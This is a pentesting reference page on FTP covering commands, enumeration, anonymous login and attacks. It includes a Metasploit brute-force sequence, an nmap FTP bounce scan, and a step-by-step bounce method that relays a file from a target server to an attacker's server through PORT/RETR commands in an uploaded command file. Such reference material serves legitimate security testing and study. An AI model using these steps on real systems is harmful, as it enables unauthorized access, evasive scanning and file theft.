๐Ÿ› ๏ธ FTP

Theory

The File Transfer Protocol (FTP) is a standard network protocol used for the transfer of files between a client and server. It usually runs on ports 21/tcp or 2121/tcp.

Basic usage

Standard UNIX-like commands, like cd, ls, mkdir, rm can be used. Here is a short list of some specific commands.
Command
Description
help
display local help information
get
download file from remote server
put
upload file on the remote server
ascii
set the transfer type to "ASCII"
binary
set the transfer type to "Binary"
close
terminate FTP session
bye
terminate ftp session and exit
When downloading files, users should set the FTP client to "Binary" (binary command) in order to prevent files from becoming corrupted during transit.
Regular text file can be downloaded in the other mode : "ASCII" (ascii command)
Hidden files can be listed with ls -a

Enumeration

Useful to get basic information about the FTP server such as its type and version.
1
telnet -vn $IP $PORT
Copied!

Accepted commands

The HELP and FEAT commands could give information about the FTP server such as the recognized commands and the extended features the server supports.
1
HELP
2
214-The following commands are recognized (* =>'s unimplemented):
3
214-CWD XCWD CDUP XCUP SMNT* QUIT PORT PASV
4
214-EPRT EPSV ALLO* RNFR RNTO DELE MDTM RMD
5
214-XRMD MKD XMKD PWD XPWD SIZE SYST HELP
6
214-NOOP FEAT OPTS AUTH CCC* CONF* ENC* MIC*
7
214-PBSZ PROT TYPE STRU MODE RETR STOR STOU
8
214-APPE REST ABOR USER PASS ACCT* REIN* LIST
9
214-NLST STAT SITE MLSD MLST
10
214 Direct comments to [email protected]
11
FEAT
12
211-Features:
13
PROT
14
CCC
15
PBSZ
16
AUTH TLS
17
MFF modify;UNIX.group;UNIX.mode;
18
REST STREAM
19
MLST modify*;perm*;size*;type*;unique*;UNIX.group*;UNIX.mode*;UNIX.owner*;
20
UTF8
21
EPRT
22
EPSV
23
LANG en-US
24
MDTM
25
SSCN
26
TVFS
27
MFMT
28
SIZE
29
211 End
Copied!

๐Ÿ› ๏ธ Files

Connection

Anonymous login

Some FTP servers are configured to let users connect anonymously and thus give them access to files on the servers without authentication.
1
$ ftp $IP $PORT
2
Name: anonymous
3
Password: <nothing>
4
ftp> ls -a # List all files (even hidden) (yes, they could be hidden)
5
ftp> ...
Copied!

Attacks

Brute force

1
msfconsole
2
use auxiliary/scanner/ftp/ftp_login
3
set RHOSTS $IP
4
set RPORT $PORT
5
set USER_FILE $user.txt
6
set PASS_FILE $pass.txt
7
run
Copied!

FTP sniffing

If the FTP communications are not encrypted and if the attacker is on the same network of the client or the server he can sniff the data packet traveling between the client and the server in order to retrieve credential.
Several tools like Wireshark could be used to sniff TCP packets.

FTP Bounce attacks

FTP Bounce attacks let an attacker requests access to ports by using the FTP command PORT. It's mostly used to make a port-scan without being detected (as you are not the one doing it, but the FTP server for you), for D.o.S. attacks, or to download files from another FTP server.
To check if the FTP server is vulnerable to Bounce attacks it is possible to use the tool NMAP.

Scan the victim's network

If a FTP server is vulnerable to Bounce attacks, an attacker could use it to scan its network without being detected.
1
nmap -v -b -P0 'username':'password'@'ftp_server' 'address(es)_to_scan'
Copied!

Download file/folder

If an attacker has access to a bounce FTP server, he can make it request files of other FTP server and download that file to his own server.
Requirements:
  • Valid credentials in the FTP intermediate server
  • Valid credentials in target FTP server
  • Both servers accept the PORT command
  • Write permissions in the intermediate server
  • Attacker's FTP server supports passive mode

Steps

  • Connect to your own FTP server and make the connection passive to make it listen in a directory where the victim service will send the file.
1
#Start server + connection
2
service pure-ftpd start
3
ftp My_IP 21
4
ftp> USER my_own_username
5
#Enable passive mode
6
ftp> pasv
7
Entering Passive Mode (F,F,F,F,X,X) #Note the output (IP and port)
8
#Tells server to accept data and to store it into the dump file
9
ftp> stor dump
Copied!
  • Create the file to send to the intermediate server with the commands that the targeted server will have to execute. Let's call this file instrs.
1
user ftp # user and pass of the targeted server
3
cwd /DIRECTORY
4
type i
5
port F,F,F,F,X,X #IP and port of the attacker
6
retr file.tar.Z
7
quit
8
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
9
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
10
...
Copied!
The extra nulls at the end of the command file are to fill up the TCP windows and ensure that the command connection stays open long enough for the whole session to be executed.
  • Upload this file on the intermediate server, then upload it from the intermediate server to the targeted server and __make the targeted machine execute this file.
1
#Run these commands on the intermediate server
2
put instrs
3
quote "port C,C,C,C,0,21" #IP of the targeted server
4
quote "retr instrs"
Copied!
  • The attacker should have received on his server the file 'file.tar.Z' renamed as 'dump'.

Resources

21 - Pentesting FTP
HackTricks
Penetration Testing of an FTP Server
Medium
https://www.thesecuritybuddy.com/vulnerabilities/what-is-ftp-bounce-attack/
www.thesecuritybuddy.com
List of FTP Commands for Linux and UNIX | Serv-U